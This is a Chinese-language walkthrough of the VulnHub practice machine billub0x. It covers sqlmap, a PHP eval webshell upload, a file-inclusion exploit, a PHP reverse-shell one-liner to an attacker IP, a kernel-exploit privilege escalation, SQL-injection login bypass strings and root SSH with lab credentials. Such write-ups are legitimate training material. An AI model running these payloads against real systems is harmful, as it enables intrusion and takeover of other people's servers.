首页 > 其他分享 >billub0x(VulnHub)

billub0x(VulnHub)

时间:2024-03-24 10:12:58浏览次数:14  
标签:文件 -- 提权 VulnHub test billub0x php 上传

billub0x

一、nmap

image-20240323140946311

image-20240323140953227

image-20240323141047408

image-20240323141101966

image-20240323141231646

二、web渗透

随便看看

image-20240323141322974

万能密码

没戏

image-20240323141704980

bp抓包导成文件

image-20240323143104168

sqlmap

sqlmap -r sql.txt --batch --dbs --random-agent -p "un"
sqlmap -r sql.txt --batch --dbs --random-agent -p "ps"

都没有什么结果

image-20240323144652186

目录爆破

image-20240323144722046

image-20240323145823866

image-20240323144734920

图片隐写

一共有六张图片,两张图片看以来一样,还有一张图片是坏的

image-20240323145016681

查看坏图片

image-20240323145142676

其他感觉也没有必要去看,应该不会有隐写的

add/add.php

image-20240323150552029

这里无法上传,后续登入后发现能上传的,估计就是没有session无法上传了

/in

image-20240323150702793

/phpmy/

image-20240323150718694

test/test.php

image-20240323150735991

wfuzz test/test.php

image-20240323151630427

test/test.php的file参数

image-20240323151723261

image-20240323151751806

神奇的事情发生了

image-20240323152101940

我们使用bp吧,看上去像一个文件包含,而不是文件读取,如果前面加上cat的话就又不行了

image-20240323152202652

c.php

image-20240323154233396

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

image-20240323155143902

继续/phpmy/

billu/b0x_billu成功进入phpmyadmin

image-20240323155346984

一组凭据
biLLu/hEx_it

ssh登入失败

image-20240323155638240

/panel -> index.php 登入

image-20240323162111402

image-20240323162134802

又看到熟悉的界面

image-20240323162152845

文件上传

存在白名单

image-20240323162237703

用于测试的文件,可以正常上传

image-20240323215640046

尝试上传webshell

<?php eval($_POST['cmd']);?>

image-20240323220051698

image-20240323220114004

image-20240323220153952

文件包含漏洞

我们尝试一下抓取这个数据包,看到着一些参数所显示的内容,判断出show这个参数的位置应该是一个文件包含

image-20240323222156476

确实。他也成功的包含出来了

image-20240323222306188

完了,貌似恶意代码没有被写进去

image-20240323222516298

重新整理思路,替换函数重新上传

image-20240324084100354

上传成功

image-20240324084216271

成功利用

image-20240324084251448

image-20240324084321566

php反弹shell

既然可以直接命令执行,那直接上反弹shell

php -r '$sock=fsockopen("192.168.126.201",11111);exec("/bin/sh -i <&3 >&3 2>&3");'

貌似没有什么反应

image-20240324085020342

最简单的尝试加个url编码看看,成功接收到反弹shell

image-20240324085143914

三、内网渗透

随便看看

image-20240324085257393

寻找提权途径

好像没啥招式了

image-20240324085807606

searchsploit

image-20240324090338990

下载编译运行提权成功

image-20240324090524015

这个靶场没有flag,那么成功结束

四、拓展

这个靶场还留给我们很多思路

源码审计

发现了前端简单的斜杠绕过

image-20240324092238756

'or 1=1 --+
'or 1=1 -- \			成功绕过登入

image-20240324094305427

image-20240324094318295

没有过滤,file的文件包含

image-20240324092740693

在/phpmy/中的目录爆破到roo用户登入

我们拿敏感路径的大字典去跑

image-20240324091812588

phpmyadmin数据库的一些基本信息,我们当然也有利于去判断它是否是密码复用

image-20240324092411262

尝试ssh

ssh [email protected]
roottoor

完美,直接是以root权限进入

image-20240324092602834

后记

确实,能不用系统漏洞的就别用系统内核漏洞进行攻击提权。系统内核漏洞提权一段时间后,靶机系统崩溃,业务被迫中断,我后续想进行其他一些操作也就只能被迫停止,这样必然会受到应急等情况的。

不过还好,重新启动靶机这个问题暂时性的解决了,后续还会有什么系统问题就咱不得而知了。

标签:文件,--,提权,VulnHub,test,billub0x,php,上传
From: https://www.cnblogs.com/carmi/p/18092115

相关文章

  • vulnhub靶机:djinn2
    一:信息收集1:主机发现靶机ip10.9.23.2282:端口扫描nmap-A-p--T410.9.23.228上一个靶机多了个5000端口21221337500073313:端口探测1:21端口anonymousnitu:7846A$56@nitish81299@0xmzfr2:1337端口和第一个游戏不太一样,没啥用3:5000端口被拒绝了4:7331......
  • vulnhub靶机:djinn1
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.2122:端口扫描nmap-A-p--T410.9.23.212ftp允许匿名登录扫描ssh时被过滤了1337不知道是个什么端口7331端口是个python环境的web服务3:端口探测1:ftp端口ftp10.9.23.212anonymous查看文件......
  • vulnhub靶机:dc-8
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机ip10.9.23.742:端口扫描nmap-A-p--T410.9.23.743:端口探测4:目录遍历dirbhttp://10.9.23.74http://10.9.23.74/robots.txt发现有登录界面地址,访问一下:/?q=user/login/发现可能存在sql注入二:渗透测......
  • vulnhub靶机:dc-7
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.1572:端口扫描nmap-A-p--T410.9.23.1573:端口探测给的提示去搜索一下@DC7USER发现是github的一些代码,下载进行查看在config.php配置文件里发现了用户名和密码$username="dc7user";$passwo......
  • Vulnhub之DarkHole_1
    DarkHole_1一信息收集IP扫描端口扫描访问80目录扫描查看目录80网页-->login注册用户我的id是2,那么应该有个账号是id=1,尝试越权修改id=1的密码把id改为1发现登陆成功,多了一个上传文件的地方,前面的目录扫描中我们也发现了/upload路径,尝试上传反弹shell上传一句话木......
  • vulnhub靶机:dc-6
    一:信息收集1:主机发现靶机IP10.9.23.1302:端口扫描nmap-A-p--T410.9.23.1303:端口探测访问失败,返回wordy的域名,在添加hosts文件:访问成功后发现和dc2长的很像用的是wordpress,用wpscan试一下wpscan--urlhttp://wordy/-eu扫出来五个用户名adminmarkgraham......
  • vulnhub靶机:dc-5
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机IP10.9.23.2042:端口扫描nmap-A-p--T410.9.23.2043:端口探测发现contact里面他有输入框发现底下这个页脚会发生变化,猜测存在文件包含漏洞,先扫一下目录4:目录遍历dirsearch-u10.9.23......
  • Vulnhub内网渗透Jangow01靶场通关
    详细请见个人博客靶场下载地址。下载下来后是.vmdk格式,vm直接导入。M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此信息搜集arp-scan-l #主机发现ip为192.168.168.15nmap-sV-A-p-192.168.168.15 #端口扫描发现开放了21ftp和80http端口,对......
  • vulnhub靶机:dc4
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.9.23.522:端口扫描nmap-A-p--T410.9.23.523:端口探测二:渗透测试1:密码爆破尝试九头蛇进行爆破构建语句:hydra-ladmin-Ppass.txt10.9.23.52http-post-form"/login.php:us......
  • vulnhub靶机:dc3
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.4.9.23.2432:端口扫描nmap-A-p--T410.9.23.2433:端口探测提示要获取root权限4:目录遍历查看Wapplayzer信息:使用的Joomla系统,所以使用joomscan(Joomla漏洞扫描器)扫描器扫描:joom......